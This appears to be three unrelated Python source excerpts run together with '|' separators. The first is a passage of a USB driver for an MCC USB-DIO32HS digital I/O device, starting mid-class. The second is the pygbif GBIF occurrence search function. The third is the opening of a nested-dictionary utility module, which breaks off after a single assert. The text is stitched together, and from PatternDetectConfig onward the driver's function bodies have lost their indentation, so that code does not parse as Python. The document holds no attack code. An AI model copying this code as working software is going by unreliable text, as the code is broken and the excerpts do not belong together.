    MEMORY = 0x30           # Read/Write EEPROM
    MEM_ADDRESS = 0x31      # EEPROM read/write address value
    MEM_WRITE_ENABLE = 0x32 # Enable writes to firmware area

    # Miscellaneous Commands
    STATUS = 0x40                # Read device status
    BLINK_LED = 0x41             # Causes the LED to blink
    RESET = 0x42                 # Reset the device
    TRIGGER_CONFIG = 0x43        # External trigger configuration
    PATTERN_DETECT_CONFIG = 0x44 # Pattern Detection trigger configuration
    SERIAL = 0x48                # Read/Write USB Serial Number

    # FPGA Configuration Commands
    FPGA_CONFIG = 0x50   # Start FPGA configuration
    FPGA_DATA = 0x51     # Write FPGA configuration data
    FPGA_VERSION = 0x52  # Read FPGA version

    HS_DELAY = 2000  # default control-transfer timeout (ms)
def __init__(self, serial=None):
    """Open the USB-DIO32HS and ensure its FPGA is configured.

    serial: optional USB serial-number string used to select among
            multiple attached devices.
    Raises IOError if no matching device is found.
    """
    self.status = 0                        # cached device status word
    self.productID = self.USB_DIO32HS_PID  # USB-DIO32HS
    self.udev = self.openByVendorIDAndProductID(0x9db, self.productID, serial)
    if not self.udev:
        raise IOError("MCC USB-DIO32HS not found")

    # Configure the FPGA if the firmware reports it unconfigured.
    if not (self.Status() & self.FPGA_CONFIGURED):
        # load the FPGA bitstream into memory
        from usb_dio32HS_rbf import FPGA_data
        print("Configuring FPGA. This may take a while ...")
        self.FPGAConfig()
        if self.Status() & self.FPGA_CONFIG_MODE:
            # Send the bitstream in 64-byte chunks, then any remainder.
            # (The old code read the loop variable after the loop, which is
            # undefined when len(FPGA_data) < 64; compute the remainder
            # offset explicitly instead.)
            full_chunks = len(FPGA_data) - len(FPGA_data) % 64
            for i in range(0, full_chunks, 64):
                self.FPGAData(FPGA_data[i:i+64])
            if len(FPGA_data) % 64:
                self.FPGAData(FPGA_data[full_chunks:])
            if not (self.Status() & self.FPGA_CONFIGURED):
                print("Error: FPGA for the USB-DIO32HS is not configured. status = ", hex(self.Status()))
                return
        else:
            print("Error: could not put USB-DIO32HS into FPGA Config Mode. status = ", hex(self.Status()))
            return
    else:
        print("USB-DIO32HS FPGA configured.")

    if sys.platform.startswith('linux'):
        if self.udev.kernelDriverActive(0):
            self.udev.detachKernelDriver(0)
            self.udev.resetDevice()

    # claim all the needed interfaces for InScan
    self.udev.claimInterface(0)

    # Find the maxPacketSize for bulk transfers
    self.wMaxPacketSize = self.getMaxPacketSize(libusb1.LIBUSB_ENDPOINT_IN | 0x6)  # EP IN 6
##############################################
# Digital I/O Commands #
##############################################
# Read/Write digital port tristate register
def DTristateR(self, port=0):
    """Read a digital port tristate register.

    The tristate register determines if the latch register value is
    driven onto the port pin: a '1' bit makes the corresponding pin an
    input, a '0' makes it an output.

    port: port number to select (0-1)
    Returns the 16-bit tristate register value.
    Raises ValueError on a bad port number.
    """
    if port < 0 or port > 1:
        # (removed the unreachable `return` that followed this raise)
        raise ValueError('DTristateR: error in port number.')
    request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
    wValue = 0
    wIndex = port  # the port number to select (0-1)
    value, = unpack('H', self.udev.controlRead(request_type, self.DTRISTATE, wValue, wIndex, 2, self.HS_DELAY))
    return value
def DTristateW(self, port, value):
    """Write a digital port tristate register.

    A '1' bit makes the corresponding pin an input, a '0' an output.

    port: port number to select (0-1)
    value: 16-bit tristate mask
    Raises ValueError on a bad port number.
    """
    if port < 0 or port > 1:
        # (removed the unreachable `return` that followed this raise)
        raise ValueError('DTristateW: error in port number.')
    request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
    request = self.DTRISTATE
    wValue = value & 0xffff
    wIndex = port
    self.udev.controlWrite(request_type, request, wValue, wIndex, [0x0], self.HS_DELAY)
def DPort(self, port):
    """Read the current state of the digital pins.

    port = 0  return port 0's value
    port = 1  return port 1's value
    port = 2  return [port0, port1]
    Raises ValueError on a bad port number.
    """
    if port < 0 or port > 2:
        # (removed the unreachable `return` that followed this raise)
        raise ValueError('DPort: error in port number.')
    request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
    wValue = 0
    wIndex = 0
    # The device always returns both 16-bit port values.
    value = unpack('HH', self.udev.controlRead(request_type, self.DPORT, wValue, wIndex, 4, self.HS_DELAY))
    if port == 0:
        return value[0]
    elif port == 1:
        return value[1]
    else:
        return list(value)
def DLatchR(self, port):
    """Read the digital port output latch register.

    port = 0  return port 0's latch value
    port = 1  return port 1's latch value
    port = 2  return [port0, port1]
    Raises ValueError on a bad port number.
    """
    if port < 0 or port > 2:
        # (removed the unreachable `return` that followed this raise)
        raise ValueError('DLatchR: error in port number.')
    request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
    wValue = 0
    wIndex = port
    value = unpack('HH', self.udev.controlRead(request_type, self.DLATCH, wValue, wIndex, 4, self.HS_DELAY))
    if port == 0:
        return value[0]
    elif port == 1:
        return value[1]
    else:
        return list(value)
def DLatchW(self, port, value):
    """Write the digital port output latch register.

    port = 0/1/2 (2 = both ports)
    value: pair of 16-bit words (port0, port1)
    Raises ValueError on a bad port number.
    """
    if port < 0 or port > 2:
        # (removed the unreachable `return` that followed this raise)
        raise ValueError('DLatchW: error in port number.')
    request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
    request = self.DLATCH
    wValue = 0x0
    wIndex = port
    value = pack('HH', value[0], value[1])
    self.udev.controlWrite(request_type, request, wValue, wIndex, value, self.HS_DELAY)
##########################################
# Register Commands #
##########################################
def ReadReg(self, address):
    """Read the FPGA register at *address*; returns the raw byte buffer."""
    req_type = DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT
    return self.udev.controlRead(req_type, self.READ_REG, 0, address & 0xff, 1, self.HS_DELAY)
def WriteReg(self, address, value):
    """Write *value* to the FPGA register at *address*.

    This command can change the tristate settings, so after sending it
    the software must re-read the DTristate status to learn the current
    state.
    """
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.WRITE_REG, value & 0xff, address & 0xff, [0x0], self.HS_DELAY)
##########################################
# Acquisition Commands #
##########################################
def InScanStart(self, channel_map, count, retrig_count, frequency, options, mode=0):
    """Start the input channel scan.

    Results in a bus stall if an input scan is already running.

    The pacer is a 32-bit timer clocked from the 96 MHz base clock:
        pacer_period = round(96 MHz / frequency) - 1
    A pacer_period of 0 (frequency == 0.0) selects the external
    INPUT_PACER_IN pin as the clock source.  Data is returned over a bulk
    IN endpoint, one 16-bit word per scanned port, low port first.  The
    scan runs until *count* scans have been returned (or forever when
    count == 0) or until InScanStop is sent.  packet_size keeps low-rate
    scans responsive by returning partial buffers; do not use SINGLEIO at
    high rates.  Pattern detection is configured with
    PatternDetectConfig; retrigger mode rearms the trigger after
    retrig_count samples.

    channel_map: bit 0 = Port 0, bit 1 = Port 1 (bits 2-7 reserved)
    count: total number of scans (0 = continuous)
    retrig_count: scans per trigger in retrigger mode
    frequency: sample frequency in Hz, clipped to 8 MHz (0 = external clock)
    options: bit 0 external trigger, bit 1 pattern-detection trigger,
             bit 2 retrigger mode (bits 3-7 reserved)
    mode: bit 0 CONTINUOUS_READOUT, bit 1 SINGLEIO,
          bit 2 FORCE_PACKET_SIZE (use self.packet_size),
          bit 3 convert to voltages
    Raises ValueError when channel_map selects no ports.
    """
    request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
    if frequency > 8.E6:  # 8MHz throughput limit
        frequency = 8.E6
    if frequency == 0.0:
        pacer_period = 0  # use external clock
    else:
        pacer_period = round((self.BASE_CLOCK / frequency) - 1)
    channel_map &= 0x3
    if channel_map == 0x0:
        # fixed message prefix (was 'InScanRead') and removed the
        # unreachable `return` that followed the raise
        raise ValueError('InScanStart: error in channel_map.')
    if channel_map == 0x1 or channel_map == 0x2:
        nchan = 1
    else:
        nchan = 2
    bytesPerScan = nchan*2              # 2 ports of 16 bits each
    self.in_nchan = nchan               # number of input channels
    self.in_frequency = frequency       # input frequency
    self.in_channel_map = channel_map   # input channel map
    self.mode = mode & 0xff             # input scan mode
    if count == 0:
        self.mode |= self.CONTINUOUS_READOUT
        self.bytesToRead = -1           # disable and sample forever
    else:
        self.bytesToRead = count*bytesPerScan  # total number of bytes to read
    # Choose the bulk packet size according to the scan mode.
    if self.mode & self.FORCE_PACKET_SIZE:
        packet_size = self.packet_size
    elif self.mode & self.SINGLEIO:
        packet_size = nchan
    elif self.mode & self.CONTINUOUS_READOUT:
        packet_size = int((((self.wMaxPacketSize//bytesPerScan) * bytesPerScan) // 2))
    else:
        packet_size = self.wMaxPacketSize // 2
    self.packet_size = packet_size
    if self.mode & self.CONTINUOUS_READOUT:
        self.in_count = 0
    else:
        self.in_count = count
    self.in_retrig_count = retrig_count
    self.in_options = options
    packet_size -= 1  # force to uint8_t size in range 0-255
    # Build the 15-byte command packet: map, count, retrig, period, size, options.
    scanPacket = bytearray(15)
    scanPacket[0] = channel_map
    pack_into('III', scanPacket, 1, count, retrig_count, pacer_period)
    scanPacket[13] = packet_size
    scanPacket[14] = options
    result = self.udev.controlWrite(request_type, self.IN_SCAN_START, 0x0, 0x0, scanPacket, timeout=200)
    self.status = self.Status()
def InScanRead(self):
    """Read one buffer of input-scan data.

    Returns a list of unsigned 16-bit samples.  Raises IOError if the
    bulk read fails and ValueError on a short transfer or scan overrun.
    """
    if self.mode & self.CONTINUOUS_READOUT or self.mode & self.SINGLEIO:
        nSamples = self.packet_size
    else:
        nSamples = self.in_count*self.in_nchan
    try:
        data = list(unpack('H'*nSamples, self.udev.bulkRead(libusb1.LIBUSB_ENDPOINT_IN | 6, int(2*nSamples), self.HS_DELAY)))
    except Exception as e:
        # Was a bare `except:` that only printed and fell through, which
        # then crashed on the undefined `data` below — raise explicitly.
        raise IOError('InScanRead: error in bulkRead.') from e
    if len(data) != nSamples:
        # (removed the unreachable `return len(data)` after this raise)
        raise ValueError('InScanRead: error in number of samples transferred.')
    if self.bytesToRead > len(data)*2:
        self.bytesToRead -= len(data)*2
    elif self.bytesToRead > 0 and self.bytesToRead < len(data)*2:  # all done
        self.InScanStop()
        self.InScanClearFIFO()
        self.status = self.Status()
        return data
    if self.mode & self.CONTINUOUS_READOUT:
        return data
    # if nbytes is a multiple of wMaxPacketSize the device will send a zero byte packet.
    if nSamples*2 % self.wMaxPacketSize == 0:
        dummy = self.udev.bulkRead(libusb1.LIBUSB_ENDPOINT_IN | 6, 2, 100)
    self.status = self.Status()
    if self.status & self.IN_SCAN_OVERRUN:
        self.InScanStop()
        # (removed the unreachable `return` after this raise)
        raise ValueError('InScanRead: Scan overrun.')
    return data
def InScanStop(self):
    """Stop a running input scan."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.IN_SCAN_STOP, 0, 0, [0x0], timeout=100)
def InScanClearFIFO(self):
    """Clear the input firmware FIFO."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.IN_SCAN_CLEAR_FIFO, 0, 0, [0x0], timeout=100)
def InBulkFlush(self, count=5):
    """Flush the input bulk pipe *count* times."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.IN_BULK_FLUSH, count, 0, [0x0], timeout=100)
def OutScanStart(self, channel_map, count, retrig_count, frequency, options):
    """Start the output channel scan.

    Results in a bus stall if a scan is already running.

    The host streams data to the outputs until the end of the scan:
    count == 0 runs until OutScanStop is sent, otherwise the scan stops
    after *count* updates (one "scan" updates every selected port).
    Timing uses the 96 MHz base clock:
        pacer_period = round(96 MHz / frequency) - 1
    (0 selects the external clock).  Output data is staged in an internal
    FIFO via bulk OUT transfers (see OutScanWrite); data may be sent
    before the scan starts, and the FIFO is cleared by
    OutScanClearFIFO.  The scan does not begin until this command is
    sent and data is present in the FIFO.

    channel_map: bit 0 = Port 0, bit 1 = Port 1 (bits 2-7 reserved)
    count: total number of scans (0 = continuous)
    retrig_count: scans per trigger in retrigger mode
    frequency: update frequency in Hz (0 = external clock)
    options: bit 0 external trigger, bit 1 pattern-detection trigger,
             bit 2 retrigger mode (bits 3-7 reserved)
    Raises ValueError when channel_map selects no ports.
    """
    request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
    if frequency == 0:
        pacer_period = 0  # use ICLKO
    else:
        pacer_period = round((self.BASE_CLOCK / frequency) - 1)
    channel_map &= 0x3
    if channel_map == 0x0:
        # fixed message prefix (was 'OutScanWrite') and removed the
        # unreachable `return` that followed the raise
        raise ValueError('OutScanStart: error in channel_map.')
    if channel_map == 0x1 or channel_map == 0x2:
        nchan = 1
    else:
        nchan = 2
    bytesPerScan = nchan*2  # 2 ports of 16 bits each
    if count == 0:
        self.bytesToWrite = -1
    else:
        self.bytesToWrite = count*bytesPerScan
    self.out_nchan = nchan  # number of output channels
    self.out_frequency = frequency
    # Build the 14-byte command packet: map, count, retrig, period, options.
    scanPacket = bytearray(14)
    scanPacket[0] = channel_map
    pack_into('III', scanPacket, 1, count, retrig_count, pacer_period)
    scanPacket[13] = options
    result = self.udev.controlWrite(request_type, self.OUT_SCAN_START, 0x0, 0x0, scanPacket, timeout=200)
    self.status = self.Status()
def OutScanWrite(self, data):
    """Write a list of unsigned 16-bit samples to the output-scan FIFO.

    Samples are serialized little-endian over bulk OUT endpoint 2.
    Failures are reported and swallowed (best-effort), matching the
    original behavior.
    """
    # data is a list of unsigned 16 bit numbers
    value = [0]*len(data)*2
    # 500 ms margin plus the nominal time the scan needs to drain the data.
    timeout = int(500 + 1000*len(data)/self.out_frequency)
    for i in range(len(data)):
        value[2*i] = data[i] & 0xff
        value[2*i+1] = (data[i] >> 8) & 0xff
    try:
        self.udev.bulkWrite(2, value, timeout)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        print('OutScanWrite: error in bulkWrite')
        return
def OutScanStop(self):
    """Stop a running output scan."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.OUT_SCAN_STOP, 0, 0, [0x0], timeout=100)
def OutScanClearFIFO(self):
    """Clear the output firmware FIFO."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.OUT_SCAN_CLEAR_FIFO, 0, 0, [0x0], timeout=100)
##########################################
# Memory Commands #
##########################################
def MemoryR(self, length):
    """Read *length* bytes of EEPROM starting at the current address.

    The address (set with MemAddressW) auto-increments during the read
    and stays within the range allowed for the EEPROM.  The range
    0x0000-0x6FFF holds the microcontroller firmware and is
    write-protected during normal operation.
    """
    req_type = DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT
    return self.udev.controlRead(req_type, self.MEMORY, 0, 0, length, self.HS_DELAY*length)
def MemoryW(self, data):
    """Write *data* to the EEPROM at the current address (see MemAddressW)."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.MEMORY, 0, 0, data, self.HS_DELAY)
def MemAddressR(self):
    """Return the 16-bit address used for EEPROM memory accesses.

    The upper byte selects the memory area:
        0x0000-0x6FFF  microcontroller firmware (write protected)
        0x7000-0x7FFF  user data
    The firmware area is protected by a separate command so it is not
    typically write-enabled.
    NOTE(review): the original comment also described unlocking a
    calibration area by writing 0xAA55 to address 0x8000, which is
    outside the map above — confirm against the device datasheet.
    """
    req_type = DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT
    raw = self.udev.controlRead(req_type, self.MEM_ADDRESS, 0, 0, 2, self.HS_DELAY)
    return raw[0] | (raw[1] << 8)  # little-endian
def MemAddressW(self, address):
    """Set the 16-bit address used for subsequent EEPROM reads/writes."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    payload = [address & 0xff, (address >> 8) & 0xff]  # little-endian
    self.udev.controlWrite(req_type, self.MEM_ADDRESS, 0, 0, payload, self.HS_DELAY)
def MemWriteEnable(self):
    """Enable writes to EEPROM range 0x0000-0x6FFF.

    Only to be used when updating the microcontroller firmware.
    """
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    unlock_code = 0xad
    self.udev.controlWrite(req_type, self.MEM_WRITE_ENABLE, 0, 0, [unlock_code], self.HS_DELAY)
##########################################
# Miscellaneous Commands #
##########################################
def Status(self):
    """Return the 16-bit device status word."""
    req_type = DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT
    raw = self.udev.controlRead(req_type, self.STATUS, 0, 0, 2, self.HS_DELAY)
    return unpack('H', raw)[0]
def BlinkLED(self, count):
    """Blink the device LED *count* times."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.BLINK_LED, 0, 0, [count], self.HS_DELAY)
def Reset(self):
    """Reset the device: it disconnects from USB and resets its microcontroller."""
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.RESET, 0, 0, [0x0], self.HS_DELAY)
def TriggerConfig(self, options):
    """Configure the scan trigger.

    The scan must be started with its "use trigger" option for this
    configuration to take effect.

    options: bit 0 = trigger mode (0 level, 1 edge)
             bit 1 = trigger polarity (0 low/falling, 1 high/rising)
             bits 2-7 reserved
    """
    req_type = HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT
    self.udev.controlWrite(req_type, self.TRIGGER_CONFIG, 0x0, 0x0, [options], self.HS_DELAY)
def TriggerConfigR(self):
    """Read back the trigger configuration byte."""
    req_type = DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT
    raw = self.udev.controlRead(req_type, self.TRIGGER_CONFIG, 0, 0, 1, self.HS_DELAY)
    return unpack('B', raw)[0]
def PatternDetectConfig(self, pattern, mask, options):
"""
This function configures the Pattern Detection trigger. Once the
trigger is received, the scan will proceed as configued. The "use
Pattern Detection trigger" option must be used in the InScanStart
command to utilize this feature.
pattern: The pattern on which to trigger
mask: These bits will mask the inputs such that only bits set to 1 here will be compared to the pattern
options: Bit field that controls various options
bit 0: Trigger Port (0 = Port 0, 1 = Port 1)
bits 1-2: 00 = Equal to Pattern
01 = Not equal to Pattern
10 = Greater than Pattern's numeric value
11 = Less than Pattern's numeric value
bits 3-7: Reserved
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.PATTERN_DETECT_CONFIG
wValue = 0
wIndex = 0
value = pack('HHB', pattern, mask, options)
self.udev.controlWrite(request_type, request, wValue, wIndex, value, self.HS_DELAY)
def PatternDetectConfigR(self):
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.PATTERN_DETECT_CONFIG
wValue = 0
wIndex = 0
value = unpack('HHB', self.udev.controlRead(request_type, request, wValue, wIndex, 5, self.HS_DELAY))
return value
def GetSerialNumber(self):
"""
This commands reads the device USB serial number. The serial
number consists of 8 bytes, typically ASCII numeric or hexadecimal digits
(i.e. "00000001").
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
value = self.udev.controlRead(request_type, self.SERIAL, wValue, wIndex, 8, self.HS_DELAY)
return value.decode()
def WriteSerialNumber(self, serial):
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.SERIAL
wValue = 0
wIndex = 0
barray = bytearray(8)
for i in range(8):
barray[i] = ord(serial[i])
self.udev.controlWrite(request_type, request, wValue, wIndex, barray, self.HS_DELAY)
##########################################
# FPGA Commands #
##########################################
def FPGAConfig(self):
"""
This command puts the device into FPGA configuration update mode,
which allows downloading the configuration for the FPGA. The
unlock code must be correct as a further safely device. If the
device is not in FPGA config mode, then the FPGAData command will
result in a control pipe stall.
Use the Status command to determine if the FPGA needs to be
configured. If so, use this command to enter configuration mode.
Open the .rbf file containing the FPGA configuration and stream
the data to the device using FPGAData. After the FPGA is
configured, then the DAQ commands will work.
"""
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.FPGA_CONFIG
unlock_code = 0xad
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, [unlock_code], self.HS_DELAY)
def FPGAData(self, data):
"""
This command writes the FPGA configuration data to the device. This
command is not accepted unless the device is in FPGA config mode. The
number of bytes to be written must be specified in wLength.
data: max length is 64 bytes
"""
if len(data) > 64:
raise ValueError('FPGAData: max length is 64 bytes.')
return
request_type = (HOST_TO_DEVICE | VENDOR_TYPE | DEVICE_RECIPIENT)
request = self.FPGA_DATA
wValue = 0
wIndex = 0
self.udev.controlWrite(request_type, request, wValue, wIndex, data, self.HS_DELAY)
def FPGAVersion(self):
"""
This command reads the FPGA version. The version is in
hexadecimal BCD, i.e. 0x0102 is version 01.02.
"""
request_type = (DEVICE_TO_HOST | VENDOR_TYPE | DEVICE_RECIPIENT)
wValue = 0
wIndex = 0
version ,= unpack('H',self.udev.controlRead(request_type, self.FPGA_VERSION, wValue, wIndex, 2, self.HS_DELAY))
return "{0:02x}.{1:02x}".format((version>>8)&0xff, version&0xff)
def printStatus(self):
status = self.Status()
print('**** USB-DIO32HS Status ****')
if status & self.IN_SCAN_RUNNING:
print(' Input scan running.')
if status & self.IN_SCAN_OVERRUN:
print(' Input scan overrun.')
if status & self.OUT_SCAN_RUNNING:
print(' Output scan running.')
if status & self.OUT_SCAN_UNDERRUN:
print(' Output scan underrun.')
if status & self.IN_SCAN_DONE:
print(' Input scan done.')
if status & self.OUT_SCAN_DONE:
print(' Output scan done.')
if status & self.FPGA_CONFIGURED:
print(' FPGA is configured.')
if status & self.FPGA_CONFIG_MODE:
print(' FPGA in configuration mode.')
|
import re
from pygbif.gbifutils import gbif_baseurl, bool2str, requests_argset, gbif_GET
def search(
    taxonKey=None,
    repatriated=None,
    kingdomKey=None,
    phylumKey=None,
    classKey=None,
    orderKey=None,
    familyKey=None,
    genusKey=None,
    subgenusKey=None,
    scientificName=None,
    country=None,
    publishingCountry=None,
    hasCoordinate=None,
    typeStatus=None,
    recordNumber=None,
    lastInterpreted=None,
    continent=None,
    geometry=None,
    recordedBy=None,
    recordedByID=None,
    identifiedByID=None,
    basisOfRecord=None,
    datasetKey=None,
    eventDate=None,
    catalogNumber=None,
    year=None,
    month=None,
    decimalLatitude=None,
    decimalLongitude=None,
    elevation=None,
    depth=None,
    institutionCode=None,
    collectionCode=None,
    hasGeospatialIssue=None,
    issue=None,
    q=None,
    spellCheck=None,
    mediatype=None,
    limit=300,
    offset=0,
    establishmentMeans=None,
    facet=None,
    facetMincount=None,
    facetMultiselect=None,
    **kwargs
):
    """
    Search GBIF occurrences.

    :param taxonKey: [int] A GBIF occurrence identifier
    :param q: [str] Simple full-text search parameter; a single word or a phrase
    :param spellCheck: [bool] If ``True`` ask GBIF to check the spelling of ``q`` only. Default: ``False``
    :param repatriated: [str] Records whose publishing country differs from the country of recording
    :param kingdomKey: [int] Kingdom classification key
    :param phylumKey: [int] Phylum classification key
    :param classKey: [int] Class classification key
    :param orderKey: [int] Order classification key
    :param familyKey: [int] Family classification key
    :param genusKey: [int] Genus classification key
    :param subgenusKey: [int] Subgenus classification key
    :param scientificName: [str] A scientific name from the GBIF backbone; synonym taxa are included
    :param datasetKey: [str] The occurrence dataset key (a uuid)
    :param catalogNumber: [str] Identifier assigned by the source within a physical collection or digital dataset
    :param recordedBy: [str] The person who recorded the occurrence
    :param recordedByID: [str] Identifier (e.g. ORCID) for the person who recorded the occurrence
    :param identifiedByID: [str] Identifier (e.g. ORCID) for the person who provided the taxonomic identification
    :param collectionCode: [str] Identifier for the physical collection or digital dataset
    :param institutionCode: [str] Identifier for the institution the record belongs to
    :param country: [str] 2-letter ISO-3166-1 code of the country where the occurrence was recorded
    :param basisOfRecord: [str] A BasisOfRecord enum value: ``FOSSIL_SPECIMEN``, ``HUMAN_OBSERVATION``,
        ``LIVING_SPECIMEN``, ``MACHINE_OBSERVATION``, ``MATERIAL_CITATION``, ``OBSERVATION``,
        ``OCCURRENCE``, or ``PRESERVED_SPECIMEN``
    :param eventDate: [date] Occurrence date in ISO 8601: yyyy, yyyy-MM, yyyy-MM-dd, or MM-dd.
        Supports ascending range queries (e.g. ``1990,1991``; ``1991,1990`` would not work)
    :param year: [int] The 4-digit year (98 is interpreted as AD 98); supports ascending range queries
    :param month: [int] Month of the year, 1 = January; supports ascending range queries
    :param decimalLatitude: [float] WGS84 latitude in [-90, 90]; supports ascending range queries
    :param decimalLongitude: [float] WGS84 longitude in [-180, 180]; supports ascending range queries
    :param publishingCountry: [str] 2-letter ISO-3166-1 code of the publishing country
    :param elevation: [int/str] Elevation in meters above sea level; supports ascending range queries
    :param depth: [int/str] Depth in meters relative to elevation; supports ascending range queries
    :param geometry: [str] WKT shape (POINT, LINESTRING, LINEARRING, POLYGON, or MULTIPOLYGON)
        to search within; polygons must have counter-clockwise ordering of points
    :param hasGeospatialIssue: [bool] ``True`` returns only records with spatial issues,
        ``False`` only records without; omit for both
    :param issue: [str] One or more occurrence-record issues to filter by
    :param hasCoordinate: [bool] Only records with lat/long data (``True``) or all records (``False``)
    :param typeStatus: [str] Type status of the specimen; see ?typestatus
    :param recordNumber: [int] Number recorded by the collector, distinct from the GBIF record number
    :param lastInterpreted: [date] Date the record was last modified in GBIF, ISO 8601;
        supports ascending range queries
    :param continent: [str] One of ``africa``, ``antarctica``, ``asia``, ``europe``,
        ``north_america``, ``oceania``, ``south_america``
    :param mediatype: [str] Media type: ``None`` (no filter), ``MovingImage``, ``Sound``, or ``StillImage``
    :param limit: [int] Number of results to return. Default: ``300``
    :param offset: [int] Record to start at. Default: ``0``
    :param establishmentMeans: [str] e.g. INTRODUCED, INVASIVE, MANAGED, NATIVE, NATURALISED, UNCERTAIN
    :param facet: [str/list] One or more fields to facet on
    :param facetMincount: [int] Minimum number of records for a value to appear in the faceting results
    :param facetMultiselect: [bool] ``True`` to also return counts for values that are not
        currently filtered. Default: ``False``
    :param kwargs: Per-facet paging parameters such as ``country_facetLimit = 3`` or
        ``country_facetOffset = 10`` (the underscore becomes a dot in the request),
        plus the accepted set of ``requests`` options (``timeout``, ``cookies``, ``auth``,
        ``allow_redirects``, ``proxies``, ``verify``, ``stream``, ``cert``)

    :return: A dictionary

    Usage::

        from pygbif import occurrences
        occurrences.search(taxonKey=3329049, limit=2)
        occurrences.search(scientificName='Ursus americanus')
        occurrences.search(datasetKey='7b5d6a48-f762-11e1-a439-00145eb45e9a', offset=10, limit=5)
        occurrences.search(q='kingfisher', limit=20, spellCheck=True)
        occurrences.search(geometry='POLYGON((30.1 10.1, 10 20, 20 40, 40 40, 30.1 10.1))', limit=20)
        occurrences.search(year='1999,2000', limit=20)
        occurrences.search(taxonKey=1, issue=['DEPTH_UNLIKELY', 'COORDINATE_ROUNDED'])
        # faceting; return only facets with limit=0, page per facet variable
        x = occurrences.search(facet=['country', 'basisOfRecord'], country_facetLimit=3, limit=0)
        x['facets']
        # requests options, e.g. a timeout
        occurrences.search(timeout=1)
    """
    url = gbif_baseurl + "occurrence/search"
    args = {
        "taxonKey": taxonKey,
        "repatriated": repatriated,
        "kingdomKey": kingdomKey,
        "phylumKey": phylumKey,
        "classKey": classKey,
        "orderKey": orderKey,
        "familyKey": familyKey,
        "genusKey": genusKey,
        "subgenusKey": subgenusKey,
        "scientificName": scientificName,
        "country": country,
        "publishingCountry": publishingCountry,
        "hasCoordinate": bool2str(hasCoordinate),
        "typeStatus": typeStatus,
        "recordNumber": recordNumber,
        "lastInterpreted": lastInterpreted,
        "continent": continent,
        "geometry": geometry,
        "recordedBy": recordedBy,
        "recordedByID": recordedByID,
        "identifiedByID": identifiedByID,
        "basisOfRecord": basisOfRecord,
        "datasetKey": datasetKey,
        "eventDate": eventDate,
        "catalogNumber": catalogNumber,
        "year": year,
        "month": month,
        "decimalLatitude": decimalLatitude,
        "decimalLongitude": decimalLongitude,
        "elevation": elevation,
        "depth": depth,
        "institutionCode": institutionCode,
        "collectionCode": collectionCode,
        "hasGeospatialIssue": bool2str(hasGeospatialIssue),
        "issue": issue,
        "q": q,
        "spellCheck": bool2str(spellCheck),
        "mediatype": mediatype,
        "limit": limit,
        "offset": offset,
        "establishmentMeans": establishmentMeans,
        "facetMincount": facetMincount,
        "facet": facet,
        "facetMultiselect": bool2str(facetMultiselect),
    }
    # Forward extra GBIF parameters (e.g. per-facet paging), translating the
    # Pythonic "_" separator into the "." the API expects
    # (country_facetLimit -> country.facetLimit).
    # NOTE: a dict comprehension is never None, so test truthiness, not `is not None`.
    gbif_kwargs = {key: kwargs[key] for key in kwargs if key not in requests_argset}
    if gbif_kwargs:
        args.update(
            {re.sub("_", ".", key): value for key, value in gbif_kwargs.items()}
        )
    # Only the recognized `requests` options are passed through to the HTTP call.
    request_kwargs = {key: kwargs[key] for key in kwargs if key in requests_argset}
    return gbif_GET(url, args, **request_kwargs)
|
"""Functions for manipulation of the nested dictionaries.
"""
import os
import functools
import operator
from typing import Callable
from abc import ABC
import random
import numpy as np
# from skimage.io import imread
# from skimage.transform import resize
# from imageio import imread
from PIL import Image
import logging
Logger = logging.getLogger('fsl.utils.nested_dict')
from . import data
def random_split(a:list, s:int):
    """Randomly partition list `a` into two lists, the first of length `s`.

    Returns a pair (first, second) covering all elements of `a` in a
    shuffled order; `second` has length ``len(a) - s``.
    """
    assert 0 <= s <= len(a)
